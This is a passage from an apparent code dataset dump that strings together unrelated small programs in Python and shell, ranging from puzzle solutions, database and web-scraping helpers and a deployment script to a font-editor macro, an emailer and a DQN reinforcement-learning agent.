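    floats = [i for i, c in enumerate(template) if c == 'X']
    for bits in product('01', repeat=len(floats)):
        out = template[:]
        for i, b in zip(floats, bits):
            out[i] = b
        yield int(''.join(out), 2)

assert sorted(expand_floating('000000000000000000000000000000X1001X', 42)) == [26, 27, 58, 59]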
addresses.append(''.join(copy))\n\n return addresses\n\nmem = {}\nfor instr in ls:\n if 'mask' in instr.mem:\n mask = instr\n else:\n loc = int(instr.mem.split('[')[1].split(']')[0])\n addrs = bitmask_addr(mask.value, loc) \n for addr in addrs:\n loc = int(addr,2)\n mem[loc] = int(instr.value)\n\nprint(sum(mem.values()))","sub_path":"2020/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417687281","text":"import os\nTHISDIR = os.path.dirname(os.path.realpath(__file__))\n\n# Models\nPLEARN_TOPMODEL = os.path.abspath(os.path.join(THISDIR, '../trained/topModel/model'))\nJAYLAN_TESTDIR = os.path.abspath(os.path.join(THISDIR, '../trained/the-attack-of-jaylan'))\n\n# Translate pLearn actions \nPLEARN_ACTIONS = {\n '(2, 0)': {'speed':2.0, 'course':0.0},\n '(2, 60)': {'speed':2.0, 'course':60.0},\n '(2, 120)': {'speed':2.0, 'course':120.0},\n '(2, 180)': {'speed':2.0, 'course':180.0},\n '(2, 240)': {'speed':2.0, 'course':240.0},\n '(2, 300)': {'speed':2.0, 'course':300.0}\n}\n\n# Aquaticus X/Y pairsx\nUPPER_LEFT_CORNER = (-83,-49)\nUPPER_RIGHT_CORNER = (56, 16)\nLOWER_LEFT_CORNER = (-53, -114)\nLOWER_RIGHT_CORNER = (82, -56)\n\nMY_FLAG = (50.0, -24.0)\nENEMY_FLAG = (-58.0, -71.0)\n\ndef plearn_action_to_text(action):\n if action == '(2, 240)':\n return 'forward'\n elif action == '(2, 300)':\n return 'right'\n elif action == '(2, 0)':\n return 'hard right'\n elif action == '(2, 60)':\n return 'backward'\n elif action == '(2, 120)':\n return 'hard left'\n elif action == '(2, 180)':\n return 'left'","sub_path":"examples/pLearn/model/util/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276261227","text":"import sys\nimport re\ndef populateListOfWords(file,mode):\n\tf = open(file,mode)\n\tlist = []\n\tfor line in f:\n\t\tlist += [x.lower() for x in re.findall(r\"[\\w]+\", line)]\n\treturn list\n\ndef displayWordFrequency(list, n):\n\twordFrequencyPairList = sorted(set([(word,list.count(word)) for word in list]), key=lambda freq: freq[1], reverse=True)\n\tfor item in wordFrequencyPairList[:n]:\n\t\tprint(item, sep='\\n')\n\nlist = populateListOfWords(\"in.txt\", 'r')\nnumberOfWordsToDisplay = int(sys.argv[1])\ndisplayWordFrequency(list, numberOfWordsToDisplay)","sub_path":"wordFrequency.py","file_name":"wordFrequency.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74041831","text":"from pymongo import MongoClient\n\n\ndef connect (host = 'localhost',port =27017, database = 'MetallicGlasses'):\n client = MongoClient(host, port)\n db = client[database]\n collection = db['Glasses']\n return collection\n\ndef add_glass (glass, collection):\n\n data = {\n 'name' : glass.name,\n 'One Dimensional XRD':\n {\n 'Two Theta': list(glass.tth),\n 'Intensity': list(glass.intensity)\n },\n 'files': glass.glass_files,\n 'Amorphous?': glass.is_amorphous,\n 'peaks':\n\n {\n 'Two Theta': glass. 
peak_positions[0],\n 'Intensity': glass.peak_positions[1]\n }\n }\n\n result = collection.insert(data)\n out = ('One post: {0}'.format(result))\n return out\n\ndef edit_glass (glass, collection):\n data = {\n 'name': glass.name,\n 'One Dimensional XRD':\n {\n 'Two Theta': list(glass.tth),\n 'Intensity': list(glass.intensity)\n },\n 'files': glass.glass_files,\n 'Amorphous?': glass.is_amorphous,\n 'peaks':\n\n {\n 'Two Theta': glass.peak_positions[0],\n 'Intensity': glass.peak_positions[1]\n }\n }\n print(glass.plate, glass.row, glass.sample_number)\n\n result = collection.update({\n 'Plate Number': glass.plate,\n 'Plate Row': glass.row,\n 'Plate Sample Number':glass.sample_number},\n {\"$set\": data}, upsert=False)\n out = ('One post: {0}'.format(result))\n\n return out\n\n\n\n\n\ncollection = connect()\nx = collection.find_one({'Plate Number':1, 'Plate Row':\"B\",'Plate Sample Number':8})\nprint(x)\n\n","sub_path":"DataBase.py","file_name":"DataBase.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40625172","text":"num = int(input())\na = input()\na = a.split(' ')\n \nmax = -1\nsum = 0\ntemp = 0\nstart = 0\nend = 0\nfor i in range(num):\n sum = sum + int(a[i])\n if sum > max:\n max = sum\n end = i\n start = temp\n elif sum < 0:\n sum = 0\n temp = i+1\n \nif(max >= 0):\n print(max,a[start],a[end],sep=' ')\nelse:\n print(0,a[0],a[len(a) -1],sep=' ')\n","sub_path":"first/Maximum Subsequence Sum02.py","file_name":"Maximum Subsequence Sum02.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203181020","text":"# Copyright 2017 Insurance Australia Group Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport common\nimport get_accounts\nimport os\n\nTEMPLATE_BASE = os.environ['LOCATION_CORE']+\"/\"+\"watchmen_cloudformation/templates/roles.tmpl\"\nTEMPLATE_DESTINATION = os.environ['LOCATION_CORE']+\"/\"+\"watchmen_cloudformation/files/roles.yml\"\n\ndef main():\n roles_cf = common.get_template(TEMPLATE_BASE)\n common.generate_file(TEMPLATE_DESTINATION, roles_cf) # Creates the deployable CF file\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python_lib/create_roles_cf.py","file_name":"create_roles_cf.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393817767","text":"import socket\n\ndef Main():\n host = '127.0.0.1'\n port = 5000\n\n s = socket.socket()\n s.connect((host, port))\n username = input(\"Enter your name\")\n guess = input(\"Enter your guess: \")\n\n while guess != 'q':\n\n s.send((guess).encode())\n data = s.recv(1024).decode()\n print(str(username)+\": \"+str(data))\n if(data == 'You guessed correct'):\n break\n guess = input(\"Enter your guess: \")\n\n s.close()\n\nif __name__ == '__main__':\n Main()\n\n\n\n\n\n","sub_path":"Module 9/Multiple 
Client/GuessClient.py","file_name":"GuessClient.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373184229","text":"import json\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\ndef queryKG(sparqlEndPoint=None, queryStr=None):\n\n print(f\"Namespace: \", sparqlEndPoint)\n sparql = SPARQLWrapper(\"http://www.theworldavatar.com/blazegraph/namespace/\" + sparqlEndPoint + \"/sparql\")\n sparql.setQuery(queryStr)\n sparql.setReturnFormat(JSON)\n results = sparql.query().convert()\n results = results['results']['bindings']\n\n for res in results:\n for key in res:\n if(isinstance(res[key], dict)):\n res[key] = res[key]['value']\n \n return results","sub_path":"Agents/PCEAgent/oscml/kg/kgQuery.py","file_name":"kgQuery.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"590502714","text":"from com.zctt.iaap.paf.clusterservice import common\nfrom multiprocessing import Process\nfrom .zkclient import zkNameService\nimport time\nimport zmq\nimport logging\n\nclass Worker(Process):\n \"\"\"Local worker class\"\"\"\n def __init__(self,target=None,args=(),serverPipe=None):\n \"\"\"Initializes local worker\"\"\"\n super(Worker,self).__init__(target=target,args=args)\n self.server = serverPipe\n self.logger = logging.getLogger('cluster.Worker')\n\n def run(self):\n func = self._target\n result = func(self._args)\n self.logger.info(type(result))\n if iter(result) is result:\n for _result in result:\n self.logger.info(_result)\n if self.server:\n self.server.send(_result)\n self.server.send(1)\n self.server.close()\n else:\n if self.server:\n self.server.send(result)\n self.server.send(1)\n self.server.close()\n\n def stop(self):\n pass\n \nclass RWorker(Process):\n \"\"\"Remote Worker class\"\"\"\n\n def __init__(self,sfunc=None,sArgs=None,serverPipe=None,serviceName='services', socket_timeout=90):\n \"\"\"Initializes remote worker\"\"\"\n super(RWorker,self).__init__()\n self.serviceName = serviceName\n self.logger = logging.getLogger('cluster.RWorker')\n self.func = sfunc\n self.args = sArgs\n self.server = serverPipe\n self.socket_timeout = socket_timeout\n self.connect()\n\n def run(self):\n self.logger.info(\"process running\")\n context = zmq.Context()\n socket = context.socket(zmq.PAIR)\n socket.connect('tcp://%s:%s' %(self.host,self.port))\n if socket:\n service_name = ''\n if self.serviceName != 'services':\n service_name = \",\\\"service\\\":%s\" %self.serviceName\n message = \"{\\\"func\\\":%s,\\\"args\\\":%s%s}\" %(self.func,self.args,service_name)\n self.logger.info(message)\n socket.send(message)\n while True:\n result = socket.recv()\n if result:\n result = common.json_decoder(result)\n result = common.dict_to_object(result)\n if self.server:\n self.server.send(result)\n break\n \n def __del__(self):\n \"\"\"Closes connection with remote server\"\"\"\n if self.socket:\n self.socket.close()\n\n def connect(self):\n \"\"\"Connects to a remote server\"\"\"\n if zkNameService.connected:\n service = zkNameService.get(self.serviceName)\n if service:\n self.logger.info(service)\n service = common.json_decoder(service)\n self.host = service.get('host')\n self.port = service.get('port')\n self.id = '%s_%s' %(self.host,self.port)\n \n return 
None","sub_path":"service/com/zctt/iaap/paf/clusterservice/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"383315738","text":"from selenium import webdriver\r\nimport pandas as pd\r\nimport time\r\nfrom datetime import datetime, timedelta\r\nfrom twit_crawl.Clean import clean_str\r\nfrom _tracemalloc import start\r\n\r\ndef twitter_search(title):\r\n try:\r\n end = datetime.today().strftime(\"%Y-%m-%d\")\r\n text_all = []\r\n for i in range(50): # range 날짜 범위 -> 오늘 부터 시작되게 만들어놓음\r\n \r\n headers = {\r\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\",\r\n \"Accept-Language\":\"ko-KR,ko\"\r\n }\r\n \r\n browser = webdriver.Chrome('C:/work/chromedriver') # 각자 컴퓨터에 파일이 존재하는 경로로\r\n browser.implicitly_wait(time_to_wait=5)\r\n \r\n # end의 시작은 오늘 start는 end의 전날로 설정하여 하루의 데이터를 가져오기위해 설정 \r\n start = (datetime.today() - timedelta(i+1)).strftime(\"%Y-%m-%d\")\r\n end = (datetime.today() - timedelta(i)).strftime(\"%Y-%m-%d\")\r\n url = \"https://twitter.com/search?q={0}%20until%3A{2}%20since%3A{1}&src=typed_query\"\r\n \r\n # 아스트라제네카(AZ), 화이자\r\n # (아스트라제네카 OR AZ백신) 으로 검색어 하면 둘중하나 언급해도 나옴\r\n # 검색어 변경은 여기서 -> 코드로 입력 말고 input 사용해도됨. 현재로써 필요성을 느끼지 못함\r\n search = url.format(title, start ,end)\r\n \r\n browser.get(search)\r\n \r\n prev_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n text = [] # 작성글 하나씩 분류 저장하기 위함 - for문 돌때마다 초기화\r\n \r\n # 웹페이지 맨 아래까지 무한 스크롤\r\n while True:\r\n # 데이터 추출\r\n element = browser.find_elements_by_class_name(\"css-901oao.r-18jsvk2.r-1qd0xha.r-a023e6.r-16dba41.r-rjixqe.r-bcqeeo.r-bnwqim.r-qvutc0\")\r\n \r\n for n in element:\r\n # name1 = n.text.split(\"\\n\") # 올바른 데이터가 나오는지 확인\r\n print(clean_str(n.text, title) +\"/\" +start)\r\n text.append(clean_str(n.text, title) +\"/\" +start) # 변수 저장\r\n # text.append(n.text.split(\"\\n\")) # 변수 저장\r\n # text_all.append(n.text.split(\"\\n\"))\r\n # print(text) # 확인\r\n \r\n # 스크롤을 화면 가장 아래로 내린다\r\n browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\r\n \r\n # 페이지 로딩 대기 (스크롤 내리고 데이터 로딩을 기다림)\r\n time.sleep(2)\r\n \r\n # 현재 문서 높이를 가져와서 저장 (if문 사용하기 위해)\r\n curr_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n if(curr_height == prev_height):\r\n break \r\n else: \r\n prev_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n print(text)\r\n df = pd.DataFrame(text)\r\n \r\n #file_name = \"./data/Twitter_{}.txt\".format(end)\r\n # 하루 데이터 저장\r\n #df.to_csv(file_name, mode='w', index = False, header = False)\r\n \r\n # 이어쓰기 - 이름 수동 수정\r\n df.to_csv(\"./data/Twitter_all_data(AZ백신).txt\", mode='a', index = False, header = False)\r\n \r\n time.sleep(2) # 저장이 완성되고 넘어갈수있는 방법을찾아보기\r\n browser.quit() # 브라우저 종료 - 완성되면\r\n print(i)\r\n print('성공')\r\n \r\n # 전체를 저장(지정해준 범위만큼) - 이어쓰기해서 필요없음\r\n #df2 = pd.DataFrame(text_all) \r\n #df2.to_csv(\"./data/Twitter_all_data.txt\", mode='w', index = False, header = False)\r\n print('끝')\r\n except Exception as e:\r\n print(e)\r\n print('에러') \r\n","sub_path":"crawling/twit_crawl/Craw.py","file_name":"Craw.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375989225","text":"class SquareRoot (object):\n def sqrt(self, number):\n if type(number) == int :\n if ( number >= 0 ):\n return 
self.floorSqrt (number , 1, number, 0) \n else :\n print (\"input is not a positive integer \")\n else :\n print (\"input is not a valid integer\")\n\n def floorSqrt(self, x, start , end, answer ) : \n # Base cases \n if (x == 0 or x == 1) : \n return x\n \n if (start <= end):\n \n # Binary Search for floor(sqrt(x)) \n mid = (start + end) // 2\n # If x is a perfect square \n if (mid*mid == x) : \n return mid\n # if x is not a perfect squre then take the floor value accumulatively via \n # passing it into the recursive function call \n if (mid * mid < x) : \n answer = mid\n return self.floorSqrt (x , mid + 1, end , answer) \n else : \n return self.floorSqrt (x , start, mid-1 , answer)\n\n return answer\n\nif __name__ == \"__main__\":\n sq = SquareRoot ()\n print ('case 1: ')\n print (sq.sqrt(6553701))\n\n sq = SquareRoot ()\n print ('case 2: ')\n print (sq.sqrt(None))\n\n sq = SquareRoot ()\n print ('case 3: ')\n print (sq.sqrt(-1))\n # expect console print output \n '''\n case 1: \n 2560\n case 2: \n input is not a valid integer\n None\n case 3: \n input is not a positive integer \n None\n '''\n","sub_path":"P3/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494918084","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('virtual_miseq', '0003_auto_20150831_1307'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='idmsuser',\n name='Organization',\n field=models.CharField(default=b'Oncology Research', max_length=45, verbose_name=b'Organization', blank=True),\n ),\n ]\n","sub_path":"virtual_miseq/migrations/0004_auto_20150831_1639.py","file_name":"0004_auto_20150831_1639.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"653088267","text":"# -*- coding: utf-8 -*-\nfrom config import *\nimport methods\nfrom telebot import types\nimport string\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n methods.start_menu(message)\n\n\ndef track_delivery(track_id):\n if True in list(map(lambda x: x not in string.digits, track_id.text)):\n keyboard = types.InlineKeyboardMarkup()\n callback_button = types.InlineKeyboardButton(text=\"Повторить\", callback_data=\"track\")\n main_menu = types.InlineKeyboardButton(text=\"Главное меню\", callback_data=\"home\")\n keyboard.add(main_menu)\n keyboard.add(callback_button)\n bot.send_message(track_id.chat.id, \"Некорректно введен номер накладной\", reply_markup=keyboard)\n\n else:\n track_result = methods.get_track_delivery(track_id)\n if not track_result:\n keyboard = types.InlineKeyboardMarkup()\n callback_button = types.InlineKeyboardButton(text=\"Повторить\", callback_data=\"track\")\n keyboard.add(callback_button)\n bot.send_message(track_id.chat.id, \"Номер накладной не найден\", reply_markup=keyboard)\n else:\n send_message = track_result['title'][0]+':'+track_result['title'][1]+'\\n\\n'+track_result['route'][0]+' '+track_result['route'][1]+'\\n'+track_result['location'][0]+' '+\\\n track_result['location'][1]+'\\n'+track_result['address'][0]+' '+track_result['address'][1]+'\\n'\\\n +track_result['information'][0] + ' ' + track_result['information'][1]\n bot.send_message(track_id.chat.id, send_message)\n\n\n@bot.callback_query_handler(func=lambda call: 
True)\ndef callback_inline(call):\n if call.message:\n if call.data == 'track':\n sent = bot.send_message(call.message.chat.id, 'Введите код')\n bot.register_next_step_handler(sent, track_delivery)\n if call.data == 'home':\n methods.start_menu(call.message)\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300271446","text":"#MenuTitle: New Tab with Glyphs Exceeding Zones\n# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function, unicode_literals\n__doc__=\"\"\"\nOpens a new tab with all glyphs where the extremums do not lie within zones.\n\"\"\"\n\nthisFont = Glyphs.font # frontmost font\nthisFontMaster = thisFont.selectedFontMaster # active master\nthisFontMasterID = thisFontMaster.id\nlistOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs\n\ndef zoneList( master ):\n\tzoneList = []\n\tfor z in master.alignmentZones:\n\t\tzoneOrigin, zoneSize = int(z.position), int(z.size)\n\t\tzoneList.append( ( zoneOrigin, zoneOrigin+zoneSize ) )\n\treturn zoneList\n\ndef isInZones( thisLayer, zones ):\n\t# ignore empty glyphs:\n\tif len(thisLayer.paths) == 0 and len(thisLayer.components) == 0:\n\t\treturn True\n\t\n\tbottom = thisLayer.bounds.origin.y\n\ttop = bottom + thisLayer.bounds.size.height\n\t\n\tisBottomInZone = False\n\tisTopInZone = False\n\t\n\tfor thisZone in zones:\n\t\tzoneOrigin, zoneEnd = thisZone[0], thisZone[1]\n\t\t\n\t\tif zoneOrigin < zoneEnd:\n\t\t\t# top zone\n\t\t\tif zoneOrigin <= top <= zoneEnd:\n\t\t\t\tisTopInZone = True\n\t\t\t\t\n\t\telif zoneOrigin > zoneEnd:\n\t\t\t# bottom zone\n\t\t\tif zoneOrigin >= bottom >= zoneEnd:\n\t\t\t\tisBottomInZone = True\n\t\n\tif isBottomInZone and isTopInZone:\n\t\treturn True\n\telse:\n\t\treturn False\n\ntabString = \"\"\nmasterZones = zoneList( thisFontMaster )\nfor thisGlyph in thisFont.glyphs:\n\tthisLayer = thisGlyph.layers[thisFontMasterID]\n\tif not isInZones( thisLayer, masterZones ):\n\t\ttabString += \"/%s\" % thisGlyph.name\n\n# opens new Edit tab:\nfrom PyObjCTools.AppHelper import callAfter\ncallAfter( Glyphs.currentDocument.windowController().addTabWithString_, tabString )\n","sub_path":"Hinting/New Tab with Glyphs Exceeding Zones.py","file_name":"New Tab with Glyphs Exceeding Zones.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28460227","text":"import urllib.request\r\nimport os\r\n\r\n\r\ndef download(url, name):\r\n if not os.path.exists('Music'):\r\n os.system('mkdir Music')\r\n \r\n path = 'Music/' + name + '.mp3'\r\n\r\n if not os.path.exists(path):\r\n try:\r\n urllib.request.urlretrieve(url, path)\r\n except AttributeError:\r\n name = str(hash(url))\r\n path = 'Music/' + name + '.mp3'\r\n urllib.request.urlretrieve(url, path)\r\n print('OK')\r\n\r\n return path\r\n\r\nimport json, requests\r\n\r\nclass VK_lib:\r\n \r\n def get_name(id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = json.loads(s.text)\r\n return s['title']\r\n\r\n def get_count(self, id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = 
json.loads(s.text)\r\n\r\n return s['count']\r\n\r\n def get_dict(id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = json.loads(s.text)\r\n music = dict()\r\n ms = s['html'].split('\\n')\r\n n_ms = list()\r\n while ms:\r\n if len(ms) >= 13:\r\n n_ms.append(ms[:13])\r\n ms = ms[13:]\r\n error_url = 0\r\n for n, i in enumerate(n_ms):\r\n composition = dict()\r\n composition['artist'] = i[11].strip().split('
')[1].split('<')[0]\r\n composition['name'] = i[10].strip().split('
')[1].split('<')[0]\r\n composition['image'] = i[1].strip().split('url(')[1].split(\"'\")[1]\r\n if composition['image'][:8] != 'https://':\r\n composition['image'] = 'None'\r\n composition['long'] = i[9].strip().split('
')[1].split('<')[0]\r\n composition['url'] = i[2].strip().split('
\\033[0m\").strip()\n if not inp_env:continue\n elif inp_env == 'Q' or inp_env == 'q':\n exit(\"\\033[1;31mBye\\033[0m\")\n elif inp_env.isdigit() and choice_env.has_key(inp_env):\n env = choice_env[inp_env]\n current_dir = '%s/%s' % (app_dir, env)\n os.chdir(current_dir)\n print('\\033[1;31m当前路径: %s\\033[0m' % os.getcwd())\n\n print(\"\\033[1;31m当前项目列表:\\033[0m\")\n for k, v in choice_app.items():\n print('\\033[1;32m %s %s\\033[0m' % (k, v))\n \n flag = False\n while not flag:\n inp_app = raw_input(\"\\033[1;32m选择更新项目 >\\033[0m\").strip()\n if not inp_app:continue\n elif inp_app == 'Q' or inp_app == 'q':\n exit(\"\\033[1;31mBye\\033[0m\")\n elif inp_app == 'B' or inp_app == 'b':\n flag = True\n elif inp_app.isdigit() and choice_app.has_key(inp_app):\n # 删除目录\n app = choice_app[inp_app]\n cmds('rm',' -rf %s %s_dependency.xml'%(app,app))\n time.sleep(1)\n print('\\033[1;31m删除 %s %s_dependency.xml 【完成】\\033[0m'%(app,app))\n \n inp_svn_url = raw_input(\"\\033[1;32m输入 svn url >\\033[0m\").strip()\n \n # svn 下载升级包\n svn_url = ' export https://192.168.24.250/svn/yjb/trunks/10%%20Release/%s' %inp_svn_url\n cmds('svn',svn_url)\n time.sleep(1)\n print('\\033[1;31msvn %s 【完成】\\033[0m' % (svn_url))\n \n # 解压升级包\n svn_patch = inp_svn_url.split('/')[-1]\n cmds('unzip',' %s'%svn_patch)\n time.sleep(1)\n print('\\033[1;31m解压升级包 %s 【完成】\\033[0m' % (svn_patch))\n \n # 本次升级文件移至当前目录\n pags_path = subprocess.Popen('find' + ' ./ -name %s '%app, shell=True, stdout=subprocess.PIPE).stdout.read().decode(\n 'utf-8')\n pags = pags_path.strip('\\n')\n cmds('mv',' %s* .'%pags)\n\n print('\\033[1;31m移动升级包 %s 【完成】\\033[0m' % (pags))\n \n # 删除本次升级包\n pags_dir = svn_patch.split('.zip')[0]\n cmds('rm',' -rf %s*'%pags_dir)\n print('\\033[1;31m删除升级包 %s 【完成】\\033[0m' % (pags_dir))\n \n # 刷新升级文件\n os.chdir(app_dir) # 切换到项目根目录\n print('\\033[1;31m当前路径: %s\\033[0m' % os.getcwd())\n cmds('bash',' stages/trade3-download.sh %s'%env)\n print('\\033[1;31mbash stages/trade3-download.sh %s 【完成】\\033[0m' % (env))\n\n # 更新readme\n changlog = 'svn:%s user:%s time:%s'%(svn_patch,user,current_time)\n mem_data = file_to_mem(readme_file)\n mem_data.append(changlog)\n mem_to_file(mem_data, readme_file)\n print('\\033[1;31m添加README %s 【完成】\\033[0m' % changlog) \n \n # 提交到 git\n git_repo.gitadd() # git add -A ./\n time.sleep(1)\n git_repo.gitcommit(changlog) # git commit -m \"xx\"\n time.sleep(1)\n git_repo.gitpush() # git push\n time.sleep(1)\n \n \n exit(\"\\033[1;32m升级成功\\033[0m\")\n \n else:\n print(\"\\033[1;31m项目不存在,请重新选择\\033[0m\")\n \n \n else:\n print(\"\\033[1;31m环境不存在,请重新选择\\033[0m\")\n \n","sub_path":"GJZQ/updateh5.py","file_name":"updateh5.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"274599800","text":"import smtplib\nimport os\nfrom constants import *\n\n\ndef send_message(toaddrs, message, subject):\n server = smtplib.SMTP(EMAIL_SERVER, EMAIL_SERVER_PORT)\n server.starttls()\n server.login(EMAIL_USERNAME, EMAIL_PASSWORD)\n formatted_message = ('From: %s\\r\\n' % EMAIL_USERNAME\n + 'To: %s\\r\\n' % MAILING_LIST_NAME\n + 'Subject: ' + subject + '\\r\\n\\n'\n + message)\n server.sendmail(from_addr=EMAIL_USERNAME, to_addrs=toaddrs, msg=formatted_message)\n server.quit()\n\n\ndef valid_phone_number(phone_number):\n nums = '0123456789'\n if len(phone_number) != 10:\n print('invalid length: {}'.format(len(phone_number)))\n return False\n for num in phone_number:\n if num not in nums:\n print('Invalid num: {}'.format(num))\n return 
False\n    return True\n\n\ndef phone_provider_to_address(phone_number, provider):\n    if valid_phone_number(phone_number) and provider in PROVIDER_TO_EMAIL:\n        return phone_number + PROVIDER_TO_EMAIL[provider]\n\n\ndef send_to_subscribers(message, subject):\n    assert (os.path.exists(ADDRESSES_FILE))\n    with open(ADDRESSES_FILE) as addr_file:\n        toaddrs = [addr for addr in addr_file]\n    send_message(toaddrs, message, subject)\n","sub_path":"emailer.py","file_name":"emailer.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195540951","text":"from .replaybuffer import *\nfrom .model import *\nimport random\nimport numpy as np\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\n\nclass DqnAgent:\n    def __init__(self, update_type=\"soft\", state_size=37, action_size=4, hidden_sizes=[64, 32],\n                 learn_every=3, transfer_every=5, lr=5e-4, double_dqn=False):\n        \"\"\"\n        :param update_type: {'soft', 'hard'} hard update copies the local weights fully to the target weights\n        :param state_size: state size of the env\n        :param action_size: action size of the env\n        :param hidden_sizes: list mirroring the neural network architecture of the agent\n        :param learn_every: frequency of learning. higher int = longer to learn\n        :param transfer_every: frequency of network weights transfer from local to the target. affects learning.\n        :param lr: learning rate of the network optimizer\n        :param double_dqn: boolean to use double dqn or not\n        \"\"\"\n\n        self.double_dqn = double_dqn\n\n        self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n        self.state_size = state_size\n        self.action_size = action_size\n\n        # Build our local and target networks\n        network_sizes = []\n        network_sizes.append(state_size)\n        network_sizes.extend(hidden_sizes)\n        network_sizes.append(action_size)\n        self.local_network = Q_Network(network_sizes).to(self.device)\n        self.target_network = Q_Network(network_sizes).to(self.device)\n\n        self.optimizer = optim.Adam(self.local_network.parameters(), lr=lr)\n\n        # Init memory and size of sample taken randomly from it\n        self.memory = ReplayBuffer(device=self.device)\n        self.LEARNING_SAMPLE_SIZE = 10\n\n        # Set learning and transfer update cycles and counters\n        self.learn_every = learn_every\n        self.transfer_every = transfer_every\n        self.learn_counter = 0\n        self.transfer_counter = 0\n\n        # set the kind of transfer to be used\n        self.update_type = update_type # {\"soft\",\"hard\"}\n        # set transfer rate for soft-transfer\n        self.TAU = 1e-3\n\n        # set `concentration` of next target's Q-value to learn\n        self.GAMMA = 0.99\n\n    def step(self, state, action, reward, next_state, done):\n        # keep in our replay buffer at every step\n        self.memory.add(state, action, reward, next_state, done)\n\n        # sample some experiences and learn every update step\n        self.learn_counter = (self.learn_counter + 1) % self.learn_every\n        if self.learn_counter == 0 and self.memory.size() >= self.LEARNING_SAMPLE_SIZE:\n            sampled_experiences = self.memory.sample(self.LEARNING_SAMPLE_SIZE)\n            self._learn(sampled_experiences)\n\n        # after some time, transfer the weights from the Q-network to the Q-target\n        self.transfer_counter = (self.transfer_counter + 1) % self.transfer_every\n        if self.transfer_counter == 0:\n            self._commit_learning()\n\n    def act(self, state, eps):\n        state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n\n        # turn off network learning mode\n        self.local_network.eval()\n\n        # temporarily set requires_grad 
